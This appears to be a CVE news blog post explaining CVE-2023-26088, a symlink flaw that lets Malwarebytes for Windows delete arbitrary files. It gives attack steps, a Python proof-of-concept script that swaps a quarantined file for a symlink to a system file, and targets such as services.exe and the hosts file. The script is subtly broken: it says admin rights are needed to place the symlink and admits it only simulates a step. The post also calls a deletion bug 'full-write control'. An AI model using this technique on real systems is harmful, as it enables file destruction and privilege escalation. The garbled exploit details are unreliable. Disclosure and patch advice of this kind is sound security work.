CVE CyberSecurity Database News

CVE-2023-26088 - How a Symbolic Link Attack Can Delete Any File on Windows with Malwarebytes Before 4.5.23

Poster -

---

Introduction

A critical flaw, tracked as CVE-2023-26088, was discovered in Malwarebytes for Windows prior to version 4.5.23. This vulnerability allows a local attacker to delete any file on the system—even those owned by administrators—by abusing how Malwarebytes handles its quarantine files. This can also lead to privilege escalation, making this a very dangerous bug.

In this post, I'll break down how this vulnerability works, show some simple exploit details, and provide the resources for anyone interested in the technical background.

What Is CVE-2023-26088?

CVE-2023-26088 relates to a classic attack called a symlink (symbolic link) attack. When Malwarebytes tries to remove a suspicious file and places it in quarantine, it doesn’t properly check if there’s a symbolic link involved. This means an attacker can trick Malwarebytes into deleting *any* file on the computer—even system files.

Arbitrary File Deletion: Any file on the system can be deleted.

- Privilege Escalation: Deleting specific critical files can allow a user to gain admin rights or break down system protections.

How Does the Exploit Work?

1. Find a file to quarantine: The attacker produces a file on disk that will trigger a Malwarebytes scan, causing it to move the file to quarantine.
2. Replace with Symbolic Link: Before Malwarebytes processes the quarantine removal, the attacker swaps the quarantined file (or folder) with a symbolic link pointing to a critical file elsewhere on the system (like a system DLL or config file).
3. Trigger File Deletion: When Malwarebytes removes the quarantined file (thinking it's just the infected file), it actually follows the symbolic link and deletes the real file elsewhere!

Step-by-step Exploit Example

Below is a sample Python script demonstrating this attack, based on general techniques (for educational purposes only):

import os
import time

# 1. Create a file in a monitored folder (e.g., Downloads)
malware_file = "C:\\Users\\Public\\malware.txt"
open(malware_file, "w").write("This is a fake malware for PoC.")

print("[*] Drop fake malware file at:", malware_file)

# 2. Wait for Malwarebytes to detect and quarantine the file
print("[*] Please run a Malwarebytes scan and quarantine the file.")
input("[!] When quarantined, press ENTER to continue...")

# 3. Point the quarantined file (simulate this) to a system file
quarantine_folder = r"C:\ProgramData\Malwarebytes\MBAMService\Quarantine"
quarantine_file = os.path.join(quarantine_folder, "malware.txt")  # Name may vary

system_file_to_delete = r"C:\Windows\system32\license.rtf"    # Example: a harmless system file

try:
    # Remove the quarantined file
    os.remove(quarantine_file)
    # Create a symbolic link from quarantine to the target file
    os.symlink(system_file_to_delete, quarantine_file)
    print(f"[*] Symlink placed: {quarantine_file} -> {system_file_to_delete}")
except PermissionError:
    print("[!] Run as admin to create symlink.")

# 4. Trigger Malwarebytes to 'remove' the quarantined file,
# which will end up deleting the linked system file.

print("[*] Now, when Malwarebytes tries to remove the quarantined object, it will delete the system file!")

Real-world Example

Security researcher Jonas Lyk described similar techniques involving anti-virus quarantine directories in other applications:

- Blog Example

For Malwarebytes specifically check

- NVD CVE-2023-26088
- Malwarebytes Security Advisory *(official patch info)*

Why Does This Happen?

Malwarebytes processes quarantined files with elevated privileges, but didn’t check if the file was a symlink. On Windows, file operations can be redirected via symlinks, so a simple check is all that was missing to prevent this full-write control.

What Files Could an Attacker Target?

- Critical OS files (system32/drivers/etc/hosts, system32/services.exe)

How is It Fixed?

Upgrade to Malwarebytes 4.5.23 or later. The company added proper checks for symbolic links before acting on quarantine files.

Conclusion

CVE-2023-26088 is another reminder that even basic filesystem checks matter when running with elevated privileges. If you're using Malwarebytes, make sure you're patched. And if you're developing software, always double check file paths, especially when moving or deleting files with higher privileges!

References

- NVD: CVE-2023-26088
- Malwarebytes Advisory
- Symlink Attack Explainers
- Windows Symlink Docs

Timeline

Published on: 03/23/2023 01:15:00 UTC
Last modified on: 03/28/2023 20:10:00 UTC